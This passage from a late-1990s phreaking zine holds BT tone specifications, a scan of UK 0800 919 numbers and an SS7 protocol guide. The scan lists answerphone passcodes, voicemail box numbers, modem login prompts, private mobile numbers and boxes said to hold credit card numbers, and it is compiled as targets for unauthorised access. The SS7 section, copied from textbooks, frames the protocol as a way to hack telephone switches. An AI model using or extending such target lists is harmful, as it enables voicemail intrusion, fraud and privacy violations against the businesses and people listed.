| | | | |2.0 s OFF. |
| | | | |Note: Cadence |
| | | | |does not |
| | | | |necessarily |
| | | | |coincide with |
| | | | |call arrival |
| | | | |indication |
| | | | |cadence |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Special Information|Precedes certain |0 dBm to -37 dBm. |950 Hz ± 50 Hz |Each frequency |
|Tone |announcements | |1400 Hz ± 50 Hz |is sent for 330 |
| | | |1800 Hz ± 50 Hz |ms ± 70 ms in |
| | | | |the order given |
| | | | |and with silent |
| | | | |periods of up to|
| | | | |30 ms between |
| | | | |adjacent signals|
|-------------------|-------------------|--------------------|-----------------|----------------|
|Call Waiting |Indicates a second |0 dBm to -37 dBm |400 Hz |0.1 ON |
|Indication |Incoming call | | |2 - 5 s OFF. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Special Call |Indicates a special|0 dBm to -37 dBm. |400 Hz |0.25 s ON. |
|Waiting Indication |second incoming | | |0.25 s OFF. |
| |call | | |0.25 s ON. |
| | | | |0.25 s OFF. |
| | | | |0.25 s ON. |
| | | | |5.0 s OFF. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Pay Tone |Indicates credit |0 dBm to -37 dBm. |400 Hz |0.125 s ON. |
|(Payphones) |expiry to payphone | | |0.125 s OFF. |
| |(and called) | | |Continues for |
| |customer | | |11 s to 13 s or |
| | | | |until money is |
| | | | |inserted into |
| | | | |the payphone |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Acknowledgement |Follows dialled |0 dBm to -37 dBm. |1600 Hz ± 50 Hz |0.5 s to 1.5 s |
|Tone |access code | | | |
| |(e.g.144) and | | | |
| |precedes automatic | | | |
| |voice prompt | | | |
| |instructions | | | |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Confirmation Tone |Used in some |0 dBm to -37 dBm. |1400 Hz |20 s followed by|
| |exchanges in place | | |silence |
| |of an announcement | | | |
| |to indicate that an| | | |
| |interrogated | | | |
| |service is active | | | |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Switching Tone |Used in some |0 dBm to -37 dBm. |400 Hz |0.2 s ON. |
| |exchanges in place | | |0.4 s OFF. |
| |of am announcement | | |2.0 s ON. |
| |to indicate that an| | |0.4 s OFF. |
| |interrogated | | | |
| |service is not | | | |
| |active | | | |
+===============================================================================================+

3. NETWORK ANNOUNCEMENTS
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
A variety of announcements may be returned to a user during call set-up
and clear down. Other announcements may be returned to the user during
set-up, operation and cancellation of supplementary services and
services other than basic access to the Public Switched Telephone
Network (PSTN) (eg. Chargecard, 0345, 0800, 0898)
Some announcements will be preceded by Special Information Tone.

All announcements will have a mean level at the BT network interface in
the range -14 dBm to -28 dBm and will be repeated for between 1 and 5
cycles.


---(OOooOO)--------UK scan of O8OO 919----------------------------------(OOo-
---(OOooOO)--------by force---------------------------------------------(OOo-
---(OOooOO)--------force007@hotmail.com---------------------------------(OOo-


"where ya gOnna run when ya can't mOve further?
781 redrum with the murder"

Key :

NA = No answer
B = Busy/engaged
M = Modem/carrier
VMS = Voice Mail System
V = Voice/Picked up
PBX = Private Branch eXchange

000 Answerphone p=1819
001 VMS
003 V
004 V
005 V
006 Answerphone p=??
007 V
010 English Meridian Mail 3333-3333
011 V when busy BT Call Minder p=????
015 V
018 V
021 V
022 V
023 English Meridian Mail
024 Company recording
029 Answerphone p=20
032 Answerphone p=??
036 Dead then "This number is temporarily out of order"
038 VMS box 4501 smi * to get in to the box
039 NA
040 V
042 NA
044 Strange answerphone p=?? responds to keypresses by beeping
045 NA
046 M - User Name Verification User Name:
048 NA
049 V "hello metro jamline"
051 NA
053 NA
054 Fax
056 NA
057 NA
058 Answerphone p=?? * cuts to the beep 0 replays the ogm
066 V
068 Answerphone p=??
070 General Accident put on hold crap music
073 M - No response
077 V
079 VMS
080 V
082 NA
083 M - No response
084 Recording "operator is busy" put on hold
086 "The number called has been changed to 0181 blah blah"
089 Fax
090 Answerphone p=?? Lampost repair line!
091 Fax
092 Answerphone p=2233
094 Recorded information on air pollution answerphone p=1122?
099 M - Garbage AT~*^ AT&
100 NA
102 NA
107 Answerphone p=1122
108 V
110 NA
111 M/F
114 M - Shiva Lanrover System @user id:
116 "This number has changed to 0702 1162518"
117 Answerphone p=112233
118 NA
119 "The number called has been changed to 01904 643355"
120 NA
121 NA
122 NA
124 NA
125 Answerphone press * for sercurity code prompt p=??
126 Answerphone p=?? you get transfered after a few attempts
127 Answerphone p=?? plays a cool tune
128 B
129 V some bloke SHOUTS at you
130 Answerphone p=2233 end of tape?
131 NA
132 V
133 Weird recording!? "No information available 807 bye"
134 Answerphone press * for security code prompt p=??
136 V "HELLO!"
139 Shitty VMS i can't get a mailbox? prompt
140 NA
141 Recording "This service is currently unavailable"
142 V
143 Shit answerphone
145 V
146 Answerphone p=??
147 NA
148 V
149 NA
151 NA
152 M - Garbage
153 V
155 Company recording
157 M - Garbage
161 Fax
162 NA
164 NA
165 Fucked up answerphone
166 Answerphone p=??
168 V
171 NA
174 Answerphone for a mobile phone with the number 0402 663083
press * for a security code prompt 4 digits
175 NA
177 NSPCC recording maybe an answerphone there
179 NA
180 Answerphone p=??
182 NA
186 V
187 Forwarded to VMS 'Voice Connector'
188 Airtours crew delay line for Manchester
191 Put on hold, Shitehouse Family hold music
199 Answerphone p=??? three digit
201 Put on hold, no music!
202 V
203 B
204 M - Garbage 
205 Answerphone p=??
206 V
208 V
209 NA
210 NA
211 NA
212 Fax
214 Answerphone p=??
216 NA
220 NA
221 Answerphone p=??
222 English Meridian Mail direct to box 4502
224 V
225 M - Garbage +++
226 Answerphone p=??
227 NA
228 NA
230 NA
231 NA
233 V
236 Forwarded to a fax
240 NA
243 NA
244 English Meridian Mail direct to box 4504 same system as above
245 NA
248 Answerphone p=*? after pressing * it responds to keypresses
249 Answerphone p=*? same as above
250 NA
254 NA
255 NA
258 V
259 Answerphone p=?? messages will have cc#'s on them
260 NA
261 Orange answerphone can't get a passcode? prompt
262 NA
268 NA
269 Answerphone
270 Answerphone p=??
271 It says it's a voice mail system but it hangs up on keypresses
273 V "Hello, Jamline"
274 Answerphone p=??
275 GAP VMS AUDIX couldn't locate the boxes
277 Airtours crew delay line for London Gatwick
280 V Sounded like a mobile phone or payphone
283 NA
285 M - No response
286 M - No response
287 M - No response
288 English Meridian Mail direct to box 4505 same system as above
289 VMS box 1000
290 NA
291 M - No resonse
292 NA
293 B
294 NA
295 PABX Peoples Bank
296 V Peoples Bank
300 Answerphone p=??
301 Stolen Credit Card Report Centre English Meridian Mail they
must have disable it coz you press # to stop recording but it
won't give you a mailbox? prompt
303 Answerphone p=??
305 NA
306 NA
307 NA
308 Answerphone p=3345? around 2345 area
309 NA
311 English Meridian Mail direct to box 4506 same system as above
312 Answerphone p=#? i think # gets you in
313 Answerphone p=1?11?
316 Fax
317 Answerphone p=??
320 Answerphone p=*? press * then it responds to keypresses
321 English Meridian Mail
322 Answerphone p=??
325 NA
326 Answerphone p=?? # does something
327 NA
328 Answerphone/VMS p=?? it hangs up if you press * or #
329 NA
330 VMS AUDIX 5 digit boxes
331 VMS AUDIX 5 digit boxes
332 Company recording
333 Answerphone p=??? * to get security code? prompt 3 digits
334 Fax
336 Weird recording loop "we can't recognize this mailbox number"
337 M - Enter Your User Name: quite a few attempts
338 NA
339 VMS AUDIX 5 digit boxes
340 NA
341 NA
342 BT Answerphone p=#?
343 V
347 "It has not been possible to connect your call"
353 Answerphone p=??
355 English Meridian Mail direct to box 4507 same system as above
356 Answerphone p=?? # does something
357 Answerphone p=?? * forwards you to somewhere?
359 Answerphone p=??
360 M - Garbage g~
361 M - Garbage *n~
362 V
365 NA
366 Airtours crew delay line for Bristol
367 Answerphone p=??
369 NA
370 V
371 PABX x100 x111 NA
372 NA
373 NA
377 NA
378 M - Call has been intercepted by Defender Security Sever ID:
381 NA
385 Answerphone p=?? cool tune
386 NA
390 V
391 Answerphone p=?? messages will have cc#'s on them
392 M - Garbage +++
394 Answerphone p=?? cool tune
395 V
396 Answerphone p=??
397 NA
398 Weird DTMF tones then answerphone p=??
399 V BT!
- All numbers between 400 and 499 emit a weird tone
501 NA
503 V
506 V
508 Forwarded to V
509 NA
511 Answerphone p=?? cool tune
514 Answerphone p=?? cool tune
516 NA
518 BT call minder
520 Answerphone p=?? cool tune
522 V
524 NA
526 NA
527 NA
528 NA
535 Recorded message
540 Answerphone p=??
543 NA
544 Airtours crew delay line for Belfast
546 Fax
548 M - Shiva Lanrover @ userid:
549 V
552 Answerphone p=22/33area
553 Answerphone p=??
554 V
555 Answerphone p=31/32/33
558 Call waiting then V
560 VMS press # infinate attempts but i couldn't find any boxes
561 Forwarded to a fax
562 Answerphone p=4455area
567 NA
568 English Meridian Mail direct to box 2254 00,50,51,53,55,56
570 Answerphone p=12?
572 Fax
575 M - Annex Command Line Interpreter - Annex Username:
576 V
582 NA
583 NA
584 Fax
585 Answerphone press # then it responds to keypresses
587 Answerphone press # for a security code? prompt 5 digits
588 VMS AUDIX 5 digit boxes
591 BT recorded message
592 NA
593 V 'student village'
595 AA shitty PABX
596 English Meridian Mail 4444 40 39 38 36 4794
597 NA
599 Fax
602 V
603 Freephone dating service
608 English Meridian Mail direct to box 445 444 443- 440- 446- 447-
610 V
611 Airtours crew delay line for Newcastle and Glasgow
613 Recording "We are currently updating the system"
614 M - No response
616 NA
618 B
619 Answerphone p=?? one digit?
621 Forwarded to an op who asks for your message <REAL voice mail>
622 NA
623 Recording "We are currently updating the system"
625 Answerphone p=??
627 BT Call Minder
628 NA
630 Answerphone p=?? sounded like it ran out of tape
631 Answerphone p=?? messages will have cc#'s on them
633 Freephone Dating Service
634 NA
635 VMS Phonemail box 322
636 NA
637 Answerphone p=??
639 Answerphone p=??
642 Answerphone press # responds to keypresses
643 Freephone dating service
644 M - No response
645 NA
646 NA
649 NA
651 NA
653 V
654 V woman asks if she can take your message
655 NA
657 Answerphone press * then it responds to keypresses
658 Recording "We're sorry an error has occured"
659 Same as above
660 Saga PABX shit
661 NA
662 Answerphone p=??
663 V
667 BT call minder
668 Answerphone p=?? messages will have cc#'s on them
669 NA
670 V
672 B&Q answerphone p=0
675 Answerphone p=456area
677 Answerphone p=??
678 Company recording
679 PABX crappy job vacancy thing
681 Answerphone * to get security code prompt p=? one or two digits
684 NA
685 Answerphone p=?? * hangs up
689 NA
690 Answerphone p=16/17
692 NA
693 Recording "this service is being updated"
694 Freephone dating service
695 Same as above
696 VMS box 540 crappy system
699 NA
700 V
703 V
704 VMS AUDIX 4 digit boxes
705 Answerphone # for security code? prompt
708 NA
709 Answerphone * for security code
717 BT recording
719 NA
720 V
721 Answerphone for a vodaphone number 0467 764224 passcode 9999
722 Fax
723 NA
724 NA
728 VMS pretty shite
729 Answerphone p=??
730 "This is AT&T Communications, number not available"
733 Fax
735 NA
737 Answerphone * for security code prompt
738 NA
739 NA
740 NA
742 English Meridian Mail direct to box 6208
744 BT Call Minder
746 WEiRD beeps on pickup then nothing, conference loop? maybe
748 NA
749 Answerphone p=??
752 V
754 V
755 VMS AUDIX 5 digits boxes
756 NA
759 Answerphone p=??
760 Fax
761 V
762 V
763 NA
764 V
765 Answerphone p=??
766 Answerphone p=?? someone picked up?
768 V
771 V
774 Answerphone p=??
776 NA
780 V
781 Answerphone p=??
783 Answerphone p=10
787 M
788 NA
790 Company recording
792 VMS AUDIX
793 NA
794 Company recording
795 Company recording
796 Company recording
797 NA
799 Airtours crew delay line for East Midlands
800 Company recording
804 Answerphone p=??
805 Company recording
806 Company recording
808 NA
811 NA
812 NA
814 Company recording
815 NA
816 NA
817 V
818 NA
819 NA
821 "You are being forwarded to a vms but the user at extension
4888 does not subscribe to this service"
822 V
824 NA
825 PBX press 3 for an English Meridian Mail
828 Answerphone p=??
829 Company recording
830 NA
833 WEiRD beeped on pick up then nothing
835 NA
836 NA
838 NA
839 Company recording
842 NA
843 BT Helpdesk answerphone, press * for security code? prompt
845 V
847 V
849 Company recording
850 NA
851 VMS press # for mailbox? prompt
855 V "good morning jam line"
856 Answerphone
857 NA
859 Company recording
861 Royal Bank of Scotland answerphone * does something
863 NA
865 "The person you are calling is not accepting annonymous calls,
please redial without witholding your number"
866 Same as above
867 And again
868 And again
869 Answerphone p=??
872 Answerphone BAD quality recording, cool tune, * does something
874 NA
875 NA
876 Company recording
877 NA
878 "The person you are calling is temperarily unavailable, please
try later"
879 "The number called has been changed to 0171 9037001"
880 NA
882 BT recording "This service is not compatible with this call"
884 M
885 M
887 NA
888 Airtours crew delay line for Leeds, Bradford, Humberside,
Aberdeen, Bournmouth and Edinburgh
891 Forwarded to the 121 Voice Mail Service crap
892 VMS same system as above
895 V
897 NA
900 Company recording - very sad
902 NA
905 B
906 Company recording
907 NA
908 Answerphone p=??
912 M
913 VMS OCTEL Direct 3 digit boxes
914 NA
917 Answerphone p=??
919 Answerphone p=??
920 V
922 Answerphone p=??
923 V "Hello?"
924 M
925 NA
927 Answerphone p=??
928 Same as above
930 VMS AUDIX
933 NA
934 BT "Calls to this number are being diverted" V
935 Answerphone p=??
937 V indian bloke actually started singing "bud bud ding ding"
940 Answerphone p=?? * does something
941 Answerphone p=??
944 Recording "No information available 806 bye"
946 Company recording
947 M/f
949 NA
950 Answerphone p=??
956 NA
958 V
959 Answerphone p=??
960 NA
962 NA
963 BT Call Minder
965 NA
966 NA
968 V
969 V
971 NA
972 V
973 NA
974 NA
976 NA
978 Answerphone p=??
980 NA
981 Answerphone p=??
983 Answerphone p=?? messages will have cc #'s on
986 NA
987 VMS AUDIX 5 digits
989 Some crap recording about rewards
993 M
994 Answerphone p=?? sounds like Mystic Meg
996 NA
997 Answerphone p=??
998 NA

shoutz:
Bodie + Hybrid + Chimmy + Zomba + Downtime + All of the D4RKCYDE crew

____________________________________________
_/ __________ _______ _ ______ _____/
\ __\ / | \| _/ \ | __|_
| | / | \ | \ \____| \
|__| \_________/____|___/\________/_________/

"so, i've decided to take my work back underground,
to stop it falling into the wrong hands..."

force007@hotmail.com O8OO 919355 direct to vmb
iCQ 21O63199


---(OOooOO)--------Switching System Number 7-SS7------------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-



_________ _________ _________________________
/ | / | | |
/ __ | / __ ::: |
/ / | | / / | | |_______________ |
/ / |___| / / |___| / /
/ /____________ / /____________ / /
| :: | / /
|_____________ ||_____________ | / /
___ | | ___ | | / /
| |_________| || |_________| | / /
| :: | / |
|___________________/ |___________________/ /____________|

Switching System Number 7 (SS7)
A Guide to the SS7 Telephony Protocol. April 1999.
By Hybrid. (th0rn@coldmail.com) (hybrid_blue@hotmail.com)



Everyone is still talking about 5ESS, and 1AESS switch programing. Whatever
country you live in, Switching System 7 has been, or _will_ be implemented.
I have written a load of files on the various protocols of SS7, and it's
many applications. I have written this file as a guide to the SS7 system, and
it's network layout. This is _new_ information, not old 5ESS stuff. People
are still going on about 5ESS and how they can hack ESS switches. Bull Shit,
SS7 is the new system, it's time that phreaks started to look into this
massive new network instead of lingering in the past. Before my time, phreaks
could _phreak_ using just a phone, now if you want to take a CO, or switch,
you have to hack it. Since the advent of CCS (Common Channel Signaling), you
cannot interact with the phone network because the signaling and voice data
are handled on seperate networks. If phreaking is going anywhere, it is
heading towards SS7 and AIN Frame Relay. I have obtained some information on
the SS7 system from Bellcore and other majour telco players. After reading
the information (from books), I have decied to type it all up into a file for
everyone to read. The information I have on SS7 is all in paper format, so I
have mearly copied it all into digital format, the way in which it should be.
SS7 is a relatively complicated protocol to grasp, but if no one bothers with
it _real_ phreaking will die. I hope everyone enjoys reading this file as
much as I enjoyed typing it up, all the information in this file has been
taken from technical books and journals, apart from the asci diagrams which
I have made to make the info easier to understand.

Index: Signaling System 7 (SS7)

1. What is Signaling?
2. What is Out-of-Band Signaling?
3. Signaling Network Architecture.
4. The North American Signaling Architecture
5. Basic Signaling Architecture
6. SS7 Link Types
7. Basic Call Setup Example
8. Database Query Example
9. Layers of the SS7 Protocol
10. What Goes Over the Signaling Link
11. Addressing in the SS7 Network
12. Signal Unit Structure
13. What are the Functions of the Different Signaling Units?
14. Message Signal Unit Structure
15. Acronym List


1. What is Signaling?

Signaling refers to the exchange of information between call components
required to provide and maintain service.

As users of the public switched telephone network, we exchange signaling with
network elements all the time. Examples of signaling between a telephone user
and the telephone network include: dialing digits, providing dial tone,
accessing a voice mailbox, sending a call-waiting tone, dialing *66 (to retry
a busy number), etc.

Signaling System 7 is a means by which elements of the telephone network
exchange information. Information is conveyed in the form of messages.
Signaling System 7 messages can convey information such as:

I am forwarding to you a call placed from 212-555-1234 to 718-555-5678. Look
for it on trunk 067.

Someone just dialed 800-555-1212. Where do I route the call? The called
subscriber for the call on trunk 11 is busy. Release the call and play a busy
tone.

The route to XXX is congested. Please don't send any messages to XXX unless
they are of priority 2 or higher. I am taking trunk 143 out of service for
maintenance.

SS7 is characterized by high-speed packet data, and out-of-band signaling.


2. What is Out-of-Band Signaling?

Out-of-band signaling is signaling that does not take place over the same
path as the conversation.

We are used to thinking of signaling as being in-band. We hear dial tone,
dial digits, and hear ringing over the same channel on the same pair of
wires. When the call completes, we talk over the same path that was used for
the signaling. Traditional telephony used to work in this way as well. The
signals to set up a call between one switch and another always took place
over the same trunk that would eventually carry the call. Signaling took the
form of a series of multifrequency (MF) tones, much like touch tone dialing
between switches.

Out-of-band signaling establishes a separate digital channel for the exchange
of signaling information. This channel is called a signaling link. Signaling
links are used to carry all the necessary signaling messages between nodes.
Thus, when a call is placed, the dialed digits, trunk selected, and other
pertinent information are sent between switches using their signaling links,
rather than the trunks which will ultimately carry the conversation. Today,
signaling links carry information at a rate of 56 or 64 kilobits per second
(kbps).

It is interesting to note that while SS7 is only used for signaling between
network elements, the ISDN D channel extends the concept of out-of-band
signaling to the interface between the subscriber and the switch. With ISDN
service, signaling that must be conveyed between the user station and the
local switch is carried on a separate digital channel called the D channel.
The voice or data which comprise the call is carried on one or more B
channels.

Why Out-of-Band Signaling?

Out-of-band signaling has several advantages that make it more desirable than
traditional in-band signaling:

It allows for the transport of more data at higher speeds (56 kbps can carry
data much faster than MF outpulsing). It allows for signaling at any time in
the entire duration of the call, not only at the beginning. It enables
signaling to network elements to which there is no direct trunk connection.


3. Signaling Network Architecture

If signaling is to be carried on a different path than the voice and data
traffic it supports, then what should that path look like?

The simplest design would be to allocate one of the paths between each
interconnected pair of switches as the signaling link. Subject to capacity
constraints, all signaling traffic between the two switches could traverse
this link. This type of signaling is known as associated signaling, and is
shown below in Figure 1.

Figure 1: Associated Signaling

Associated signaling works well as long as a switches only signaling
requirements are between itself and other switches to which it has trunks. If
call setup and management was the only application of SS7, associated
signaling would meet that need simply and efficiently. In fact, much of the
out-of-band signaling deployed in Europe today uses associated mode.

The North American implementers of Signaling System 7, however, wanted to
design a signaling network that would enable any node to exchange signaling
with any other SS7-capable node. Clearly, associated signaling becomes much
more complicated when it is used to exchange signaling between nodes which do
not have a direct connection. From this need, the North American Signaling
System 7 architecture was born.


4. The North American Signaling Architecture

The North American signaling architecture defines a completely new and
separate signaling network. The network is built out of three essential
components, interconnected by signaling links. These components are signal
switching points (SSPs), signal transfer points (STPs), and signal control
points (SCPs). They are outlined in Table 1 below.

Table 1: North American Signaling Architecture Components


Component Function

Signal switching
points (SSPs)
SSPs are telephone switches (end offices or tandems)
equipped with SS7-capable software and terminating
signaling links. They generally originate, terminate,
or switch calls.
Signal transfer
points (STPs)
STPs are the packet switches of the SS7 network. They
receive and route incoming signaling messages towards
the proper destination. They also perform specialized
routing functions.
Signal control
points (SCPs)
SCPs are databases that provide information necessary
for advanced call-processing capabilities.


Once deployed, the availability of the SS7 network is critical to call
processing. Unless SSPs can exchange signaling, they cannot complete any
interswitch calls. For this reason, the SS7 network is built using a highly
redundant architecture. Each individual element must also meet exacting
requirements for availability. Finally, protocol has been defined between
interconnected elements to facilitate the routing of signaling traffic around
any difficulties that may arise in the signaling network.

To enable signaling network architectures to be easily communicated and
understood, a standard set of symbols was adopted for depicting SS7 networks.
Figure 2 shows the symbols that are used to depict these three key elements
of any SS7 network.

STPs and SCPs are customarily deployed in pairs. While elements of a pair are
not generally co-located, they work redundantly to perform the same logical
function. When drawing complex network diagrams, these pairs may be depicted
as a single element for simplicity, as shown in Figure 3.

Figure 3: STP and SCP Pairs


5. Basic Signaling Architecture

Figure 4 shows a small example of how the basic elements of an SS7 network
are deployed to form two interconnected networks.

Figure 4: Sample Network

Several points should be noted:


1.STPs W and X perform identical functions. They are redundant. Together,
they are referred to as a mated pair of STPs. Similarly, STPs Y and Z form
a mated pair.

2.Each SSP has two links (or sets of links), one to each STP of a mated pair.
All SS7 signaling to the rest of the world is sent out over these links.
Because the STPs of a mated pair are redundant, messages sent over either
link (to either STP) will be treated equivalently.

3.The STPs of a mated pair are joined by a link (or set of links).

4.Two mated pairs of STPs are interconnected by four links (or sets of links)
These links are referred to as a quad.

5.SCPs are usually (though not always) deployed in pairs. As with STPs, the
SCPs of a pair are intended to function identically. Pairs of SCPs are also
referred to as mated pairs of SCPs. Note that they are not directly joined
by a pair of links.

Signaling architectures such as this, which provide indirect signaling paths
between network elements, are referred to as providing quasi-associated
signaling.


6. SS7 Link Types

SS7 signaling links are characterized according to their use in the signaling
network. Virtually all links are identical in that they are 56-kbps or 64-
kbps bi-directional data links that support the same lower layers of the
protocol; what is different is their use within a signaling network. The
defined link types are shown in Figure 5 below and defined as follows:

Figure 5: Link Types

A Links

A links are links that interconnect an STP and either an SSP or an SCP, which
are collectively referred to as signaling end points ("A" is intended to
stand for access). A links are used for the sole purpose of delivering
signaling to or from the signaling end points (they could just as well be
referred to as signaling beginning points). Examples of A links are 2-8, 3-7,
and 5-12 in Figure 5.

Signaling that an SSP or SCP wishes to send to any other node is sent on
either of its A links to its "home" STP, which, in turn, processes or routes
the messages. Similarly, messages intended for an SSP or SCP will be routed
to one of its "home" STPs, which will forward them to the addressed node over
its A links.

C Links

C links are links that interconnect mated STPs. As will be seen later, they
are used to enhance the reliability of the signaling network in instances
where one or several links are unavailable. "C" stands for cross. (7-8, 9-10
and 11-12 are C links.)

B Links, D Links, and B/D Links

Links interconnecting two mated pairs of STPs are referred to as either B
links, D links, or B/D links. Regardless of their name, their function is to
carry signaling messages beyond their initial point of entry to the signaling
network towards their intended destination. The "B" stands for bridge and is
intended to describe the quad of links interconnecting peer pairs of STPs.
The "D" denotes diagonal and is intended to describe the quad of links
interconnecting mated pairs of STPs at different hierarchical levels. Because
there is no clear hierarchy associated with a connection between networks,
interconnecting links are referred to as either B, D, or B/D links. (7-11 and
7-12 are examples of B links; 8-9 and 7-10 are examples of D links; 10-13 and
9-14 are examples of interconnecting links and can be referred to as B, D, or
B/D links.)

E Links

While an SSP is connected to its "home" STP pair by a set of "A" links,
enhanced reliability can be provided by deploying an additional set of links
to a second STP pair. These links, called "E" (extended) links provide backup
connectivity to the SS7 network in the event that the "home" STPs cannot be
reached via the "A" links. While all SS7 networks include "A," "B/D," and "C"
links, "E" links may or may not be deployed at the discretion of the network
provider, The decision of whether or not to deploy "E" links can be made by
comparing the cost of deployment with the improvement in reliability. (1-11
and 1-12 are E links.)

F Links

"F" (for fully associated) links are links which directly connect two
signaling end points. F links allow associated signaling only. Because they
_bypass_ the security features provided by an STP, F links are not generally
deployed between networks. Their use within an individual network is at the
discretion of the network provider. (1-2 is an F link.)


7. Basic Call Setup Example

Before going into much more detail, it might be helpful to look at several
basic calls and the way in which they use SS7 signaling (see Figure 6).

Figure 6: Call Setup Example

In this example, a subscriber on switch A places a call to a subscriber on
switch B:

1.Switch A analyzes the dialed digits and determines that it needs to send
the call to switch B.

2.Switch A selects an idle trunk between itself and switch B and formulates
an initial address message (IAM), the basic message necessary to initiate a
call. The IAM is addressed to switch B. It identifies the initiating switch
(switch A), the destination switch (switch B), the trunk selected, the
calling and called numbers, as well as other information beyond the scope
of this example.

3.Switch A picks one of its A links (say AW) and transmits the message over
the link for routing to switch B.

4.STP W receives a message, inspects its routing label, and determines that
it is to be routed to switch B. It transmits the message on link BW.

5.Switch B receives the message. On analyzing the message, it determines that
it serves the called number and that the called number is idle.

6.Switch B formulates an address complete message (ACM), which indicates that
the IAM has reached its proper destination. The message identifies the
recipient switch (A), the sending switch (B), and the selected trunk.

7.Switch B picks one of its A links (say BX) and transmits the ACM over the
link for routing to switch A. At the same time, it completes the call path
in the backwards direction (towards switch A), sends a ringing tone over
that trunk towards switch A, and rings the line of the called subscriber.

8.STP X receives the message, inspects its routing label, and determines that
it is to be routed to switch A. It transmits the message on link AX.

9.On receiving the ACM, switch A connects the calling subscriber line to the
selected trunk in the backwards direction (so that the caller can hear the
ringing sent by switch B).

10.When and/or if the called subscriber picks up the phone, switch B
formulates an answer message (ANM), identifying the intended recipient
switch (A), the sending switch (B), and the selected trunk.

11.Switch B selects the same A link it used to transmit the ACM (link BX) and
sends the ANM. By this time, the trunk must also be connected to the
called line in both directions (to allow conversation).

12.STP X recognizes that the ANM is addressed to switch A and forwards it
over link AX.

13.Switch A ensures that the calling subscriber is connected to the outgoing
trunk (in both directions) and that conversation can take place.

14.If the calling subscriber hangs up first (following the conversation),
switch A will generate a release message (REL) addressed to switch B,
identifying the trunk associated with the call. It sends the message on
link AW.

15.STP W receives the REL, determines that it is addressed to switch B, and
forwards it using link WB.

16.Switch B receives the REL, disconnects the trunk from the subscriber line,
returns the trunk to idle status, generates a release complete message
(RLC) addressed back to switch A, and transmits it on link BX. The RLC
identifies the trunk used to carry the call.

17.STP X receives the RLC, determines that it is addressed to switch A, and
forwards it over link AX.

18.On receiving the RLC, switch A idles the identified trunk.


8. Database Query Example

People generally are familiar with the toll-free aspect of 800 (or 888)
numbers, but these numbers have significant additional capabilities made
possible by the SS7 network. 800 numbers are "virtual" telephone numbers.
Although they are used to point to "real" telephone numbers, they are not
assigned to the subscriber line itself.

When a subscriber dials an 800 number, it is a signal to the switch to
suspend the call and seek further instructions from a database. The database
will provide either a real phone number to which the call should be directed,
or it will identify another network (e.g., a long-distance carrier) to which
the call should be routed for further processing. While the response from the
database could be the same for every call (as, for example, if you have a
personal 800 number), it can be made to vary based on the calling number, the
time of day, the day of the week, or a number of other factors.

The following example shows how an 800 call is routed (see Figure 7).

Figure 7: Database Query Example


1.A subscriber served by switch A wants to reserve a rental car at a
company's nearest location. She dials the company's advertised 800 number.

2.When the subscriber has finished dialing, switch A recognizes that this is
an 800 call and that it requires assistance to handle it properly.

3.Switch A formulates an 800 query message including the calling and called
number and forwards it to either of its STPs (e.g., X) over its A link to
that STP (AX).

4.STP X determines that the received query is an 800 query and selects a
database suitable to respond to the query (e.g., M).

5.STP X forwards the query to SCP M over the appropriate A link (MX).

6.SCP M receives the query, extracts the passed information, and (based on
its stored records) selects either a "real" telephone number or a network
(or both) to which the call should be routed.

7.SCP M formulates a response message with the information necessary to
properly process the call, addresses it to switch A, picks an STP and an A
link to use (e.g., MW), and routes the response.

8.STP W receives the response message, recognizes that it is addressed to
switch A, and routes it to A over AW.

9.Switch A receives the response and uses the information to determine where
the call should be routed. It then picks a trunk to that destination,
generates an initial address message (IAM), and proceeds (as it did in the
previous example) to set up the call.


9. Layers of the SS7 Protocol

As the call-flow examples show, the SS7 network is an interconnected set of
network elements that is used to exchange messages in support of
telecommunications functions. The SS7 protocol is designed to both facilitate
these functions and to maintain the network over which they are provided.
Like most modern protocols, the SS7 protocol is layered.

The underlying layers of the SS7 protocol are as follows:

Physical Layer

This defines the physical and electrical characteristics of the signaling
links of the SS7 network. Signaling links utilize DS0 channels and carry raw
signaling data at a rate of 56 kbps or 64 kbps (56 kbps is the more common
implementation).

Message Transfer Part - Level 2

The level 2 portion of the message transfer part (MTP Level 2) provides
link-layer functionality. It ensures that the two end points of a signaling
link can reliably exchange signaling messages. It incorporates such
capabilities as error checking, flow control, and sequence checking.

Message Transfer Part - Level 3

The level 3 portion of the message transfer part (MTP Level 3) extends the
functionality provided by MTP level 2 to provide network layer functionality.
It ensures that messages can be delivered between signaling points across the
SS7 network regardless of whether they are directly connected. It includes
such capabilities as node addressing, routing, alternate routing, and
congestion control.

Collectively, MTP levels 2 and 3 are referred to as the message transfer part
(MTP).

Signaling Connection Control Part

The signaling connection control part (SCCP) provides two major functions
that are lacking in the MTP. The first of these is the capability to address
applications within a signaling point. The MTP can only receive and deliver
messages from a node "as a whole", it does not deal with software
applications within a node.

While MTP network management messages and basic call-setup messages are
addressed to a node as a whole, other messages are used by separate
applications (referred to as subsystems) within a node. Examples of
subsystems are 800 call processing, calling-card processing, advanced
intelligent network, and CLASS services (e.g., Repeat Dialing and Call
Return). The SCCP allows these subsystems to be addressed explicitly.

Global Title Translation

The second function provided by the SCCP is the ability to perform
incremental routing using a capability called global title translation.
Global title translation frees originating signaling points from the burden
of having to know every potential destination to which they might have to
route a message. A switch can originate a query, for example, and address it
to an STP along with a request for global title translation. The receiving
STP can then examine a portion of the message, make a determination as to
where the message should be routed, and then route it.

For example, calling-card queries (used to verify that a call can be properly
billed to a calling card) must be routed to an SCP designated by the company
that issued the calling card. Rather than maintaining a nationwide database
of where such queries should be routed (based on the calling-card number),
switches generate queries addressed to their local STPs, which, using global
title translation, select the correct destination to which the message should
be routed. Note that there is no magic here; STPs must maintain a database
that enables them to determine to where a query should be routed. Global
title translation effectively centralizes the problem and places it in a node
(the STP) that has been designed to perform this function.

In performing global title translation, an STP does not need to know the
exact final destination of a message. It can, instead, perform "intermediate
global title translation," in which it uses its tables to find another STP
further along the route to

  
the destination. That STP, in turn, can perform
"final global title translation," routing the message to its actual
destination.

Intermediate global title translation minimizes the need for STPs to maintain
extensive information about nodes which are far removed from them. Global
